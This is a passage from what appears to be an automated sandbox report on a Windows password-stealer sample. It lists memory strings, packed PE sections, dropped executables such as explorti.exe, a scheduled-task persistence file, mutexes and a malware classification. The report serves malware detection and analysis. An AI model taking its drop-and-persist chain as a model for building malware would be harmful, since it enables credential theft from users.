                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001BBC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001C27000.00000004.00000020.00020000.00000000.sdmp, KKKJKEBKFCAAECAAAAAE.0.drString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001BBC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001C27000.00000004.00000020.00020000.00000000.sdmp, KKKJKEBKFCAAECAAAAAE.0.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000003.1730833023.0000000001B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000003.1730833023.0000000001B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000003.1730833023.0000000001B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                        Source: KKKJKEBKFCAAECAAAAAE.0.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: https://mozilla.org0/
                        Source: EHJJKFCBGIDGHIECGCBKFHIEBG.0.drString found in binary or memory: https://support.mozilla.org
                        Source: EHJJKFCBGIDGHIECGCBKFHIEBG.0.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                        Source: EHJJKFCBGIDGHIECGCBKFHIEBG.0.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.0000000000E86000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000003.1729775800.0000000022E1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.0000000000E86000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.0000000000E86000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000003.1729775800.0000000022E1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.0000000000E86000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001BBC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001C27000.00000004.00000020.00020000.00000000.sdmp, KKKJKEBKFCAAECAAAAAE.0.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                        Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: https://www.digicert.com/CPS0
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000003.1730833023.0000000001B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001BBC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001C27000.00000004.00000020.00020000.00000000.sdmp, KKKJKEBKFCAAECAAAAAE.0.drString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000003.1730833023.0000000001B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                        Source: EHJJKFCBGIDGHIECGCBKFHIEBG.0.drString found in binary or memory: https://www.mozilla.org
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.0000000000E28000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/about/
                        Source: EHJJKFCBGIDGHIECGCBKFHIEBG.0.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.0000000000E28000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/about/t.exe
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.0000000000E28000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                        Source: EHJJKFCBGIDGHIECGCBKFHIEBG.0.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/contribute/npvZC5maWxlds:
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/contribute/vchost.exe
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.0000000000E28000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000003.1796836946.000000002917C000.00000004.00000020.00020000.00000000.sdmp, EHJJKFCBGIDGHIECGCBKFHIEBG.0.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                        Source: EHJJKFCBGIDGHIECGCBKFHIEBG.0.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.0000000000E28000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000003.1796836946.000000002917C000.00000004.00000020.00020000.00000000.sdmp, EHJJKFCBGIDGHIECGCBKFHIEBG.0.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.0000000000E28000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe

                        System Summary

                        barindex
                        Source: BGIIDAEBGC.exe.0.drStatic PE information: section name:
                        Source: BGIIDAEBGC.exe.0.drStatic PE information: section name: .idata
                        Source: BGIIDAEBGC.exe.0.drStatic PE information: section name:
                        Source: amadka[1].exe.0.drStatic PE information: section name:
                        Source: amadka[1].exe.0.drStatic PE information: section name: .idata
                        Source: amadka[1].exe.0.drStatic PE information: section name:
                        Source: explorti.exe.5.drStatic PE information: section name:
                        Source: explorti.exe.5.drStatic PE information: section name: .idata
                        Source: explorti.exe.5.drStatic PE information: section name:
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeStatic PE information: section name:
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeStatic PE information: section name:
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeStatic PE information: section name:
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeStatic PE information: section name:
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeStatic PE information: section name:
                        Source: random[1].exe.8.drStatic PE information: section name:
                        Source: random[1].exe.8.drStatic PE information: section name:
                        Source: random[1].exe.8.drStatic PE information: section name:
                        Source: random[1].exe.8.drStatic PE information: section name:
                        Source: random[1].exe.8.drStatic PE information: section name:
                        Source: a37ec701f3.exe.8.drStatic PE information: section name:
                        Source: a37ec701f3.exe.8.drStatic PE information: section name:
                        Source: a37ec701f3.exe.8.drStatic PE information: section name:
                        Source: a37ec701f3.exe.8.drStatic PE information: section name:
                        Source: a37ec701f3.exe.8.drStatic PE information: section name:
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess Stats: CPU usage > 49%
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C4EED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset,0_2_6C4EED10
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C52B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,0_2_6C52B700
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C52B8C0 rand_s,NtQueryVirtualMemory,0_2_6C52B8C0
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C52B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,0_2_6C52B910
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C4CF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,0_2_6C4CF280
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeFile created: C:\Windows\Tasks\explorti.jobJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C4C35A00_2_6C4C35A0
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C4D54400_2_6C4D5440
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C53545C0_2_6C53545C
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C505C100_2_6C505C10
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C512C100_2_6C512C10
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C53AC000_2_6C53AC00
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C53542B0_2_6C53542B
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C4D64C00_2_6C4D64C0
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C4ED4D00_2_6C4ED4D0
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C506CF00_2_6C506CF0
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C4CD4E00_2_6C4CD4E0
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C4D6C800_2_6C4D6C80
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C5234A00_2_6C5234A0
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C52C4A00_2_6C52C4A0
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C4DFD000_2_6C4DFD00
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C4F05120_2_6C4F0512
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C4EED100_2_6C4EED10
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C500DD00_2_6C500DD0
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C5285F00_2_6C5285F0
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C503E500_2_6C503E50
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C4E46400_2_6C4E4640
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C4E9E500_2_6C4E9E50
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C512E4E0_2_6C512E4E
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C536E630_2_6C536E63
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C4CC6700_2_6C4CC670
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C507E100_2_6C507E10
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C5156000_2_6C515600
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C529E300_2_6C529E30
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C5376E30_2_6C5376E3
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C4CBEF00_2_6C4CBEF0
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C4DFEF00_2_6C4DFEF0
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C52E6800_2_6C52E680
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C4E5E900_2_6C4E5E90
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C524EA00_2_6C524EA0
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C5077100_2_6C507710
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C4D9F000_2_6C4D9F00
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C4CDFE00_2_6C4CDFE0
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C4F6FF00_2_6C4F6FF0
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C5177A00_2_6C5177A0
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C4E88500_2_6C4E8850
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C4ED8500_2_6C4ED850
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C50F0700_2_6C50F070
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C4D78100_2_6C4D7810
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C50B8200_2_6C50B820
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C5148200_2_6C514820
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C5350C70_2_6C5350C7
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C4EC0E00_2_6C4EC0E0
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C5058E00_2_6C5058E0
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C4F60A00_2_6C4F60A0
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C4EA9400_2_6C4EA940
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C51B9700_2_6C51B970
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C53B1700_2_6C53B170
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C4DD9600_2_6C4DD960
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C5051900_2_6C505190
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C5229900_2_6C522990
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C4CC9A00_2_6C4CC9A0
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C4FD9B00_2_6C4FD9B0
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C509A600_2_6C509A60
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C508AC00_2_6C508AC0
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C50E2F00_2_6C50E2F0
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C4E1AF00_2_6C4E1AF0
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C53BA900_2_6C53BA90
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C532AB00_2_6C532AB0
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C4C22A00_2_6C4C22A0
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C4F4AA00_2_6C4F4AA0
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C4DCAB00_2_6C4DCAB0
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C4C53400_2_6C4C5340
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C4DC3700_2_6C4DC370
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C50D3200_2_6C50D320
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C5353C80_2_6C5353C8
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C4CF3800_2_6C4CF380
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 8_2_007CE4108_2_007CE410
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 8_2_007C4CD08_2_007C4CD0
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 8_2_008030488_2_00803048
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 8_2_007F7D638_2_007F7D63
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 8_2_00806EE98_2_00806EE9
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 8_2_007C4AD08_2_007C4AD0
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 8_2_0080763B8_2_0080763B
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 8_2_00802BB08_2_00802BB0
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 8_2_008087008_2_00808700
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 8_2_0080775B8_2_0080775B
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeCode function: 11_2_7F770B7911_2_7F770B79
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeCode function: 11_2_7F77000011_2_7F770000
                        Source: Joe Sandbox ViewDropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: String function: 6C5094D0 appears 90 times
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: String function: 6C4FCBE8 appears 134 times
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001C34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1883646644.000000006C745000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeStatic PE information: Section: ZLIB complexity 0.9996665396341463
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeStatic PE information: Section: ZLIB complexity 0.99517822265625
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeStatic PE information: Section: ZLIB complexity 0.9893798828125
                        Source: BGIIDAEBGC.exe.0.drStatic PE information: Section: ZLIB complexity 0.9976359716530054
                        Source: BGIIDAEBGC.exe.0.drStatic PE information: Section: vtxoxanz ZLIB complexity 0.9944127768378961
                        Source: amadka[1].exe.0.drStatic PE information: Section: ZLIB complexity 0.9976359716530054
                        Source: amadka[1].exe.0.drStatic PE information: Section: vtxoxanz ZLIB complexity 0.9944127768378961
                        Source: explorti.exe.5.drStatic PE information: Section: ZLIB complexity 0.9976359716530054
                        Source: explorti.exe.5.drStatic PE information: Section: vtxoxanz ZLIB complexity 0.9944127768378961
                        Source: random[1].exe.8.drStatic PE information: Section: ZLIB complexity 0.9996665396341463
                        Source: random[1].exe.8.drStatic PE information: Section: ZLIB complexity 0.99517822265625
                        Source: random[1].exe.8.drStatic PE information: Section: ZLIB complexity 0.9893798828125
                        Source: a37ec701f3.exe.8.drStatic PE information: Section: ZLIB complexity 0.9996665396341463
                        Source: a37ec701f3.exe.8.drStatic PE information: Section: ZLIB complexity 0.99517822265625
                        Source: a37ec701f3.exe.8.drStatic PE information: Section: ZLIB complexity 0.9893798828125
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@19/28@0/3
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeCode function: 0_2_6C527030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,0_2_6C527030
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dllJump to behavior
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7576:120:WilError_03
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7640:120:WilError_03
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile created: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
